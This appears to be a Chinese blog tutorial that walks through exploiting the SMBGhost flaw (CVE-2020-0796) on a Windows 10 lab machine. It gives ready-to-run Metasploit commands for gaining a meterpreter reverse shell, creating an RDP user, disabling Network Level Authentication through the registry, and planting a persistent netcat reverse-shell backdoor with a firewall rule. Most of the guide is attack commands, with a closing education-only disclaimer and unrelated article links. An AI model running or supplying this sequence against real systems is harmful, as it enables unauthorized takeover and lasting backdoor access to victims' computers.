掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限

以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:

环境介绍

  • 靶机 :IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机 :IP地址为192.168.1.53

靶机准备

  1. 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  2. 检查系统补丁 :确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  3. 开启445端口:确保靶机的445端口(SMB协议)是开放的。

获取Shell

  1. 使用Metasploit框架

    • 启动Metasploit:msfconsole
    • 使用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost
  2. 设置选项

    • 显示模块选项:show options
    • 设置目标主机IP:set RHOSTS 192.168.1.60
    • 设置payload:set payload windows/x64/meterpreter/reverse_tcp
    • 设置攻击机监听IP:set LHOST 192.168.1.53
    • 禁用模拟模式:set DefangedMode false
  3. 执行exploit

    • 运行exploit:exploit

创建新用户并开启远程桌面

  1. 开启RDP远程桌面

    • 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
  2. 创建RDP用户

    • 设置用户名和密码:set username xuegodset password 123456
    • 指定会话ID:set session 1
    • 运行模块:run
  3. 检查NLA设置

    • 查询注册表以确定是否开启网络级身份验证(NLA)。
  4. 关闭NLA(如果开启):

    • 修改注册表值SecurityLayerUserAuthentication为0,以允许非NLA的RDP连接。
  5. 连接远程桌面

    • 在Kali上使用rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60

开启后门维持权限访问

  1. 配置后门程序

    • 上传nc(Netcat)到Windows 10系统。
    • 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
  2. 设置防火墙规则

    • 允许443端口的网络访问,以使后门有效。
  3. 重启Windows 10

    • 重启靶机以应用更改,并等待后门程序运行。
  4. 连接后门

    • 在Kali上使用nc命令连接后门:nc -v 192.168.1.60 443
  5. MSF控制台连接(可选):

    • 在Metasploit框架中使用connect命令连接到后门:connect 192.168.1.60 443

总结

  • 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。

相关推荐
程序设计实验室6 小时前
在 Windows 11 上使用 Hyper-V 虚拟机准备安装OpenClaw
windows
唐宋元明清21882 天前
.NET Win32磁盘动态卷/跨区卷触发“函数不正确”问题排查
windows·c#·存储
用户962377954485 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主6 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954488 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机8 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机8 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954488 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star8 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954488 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全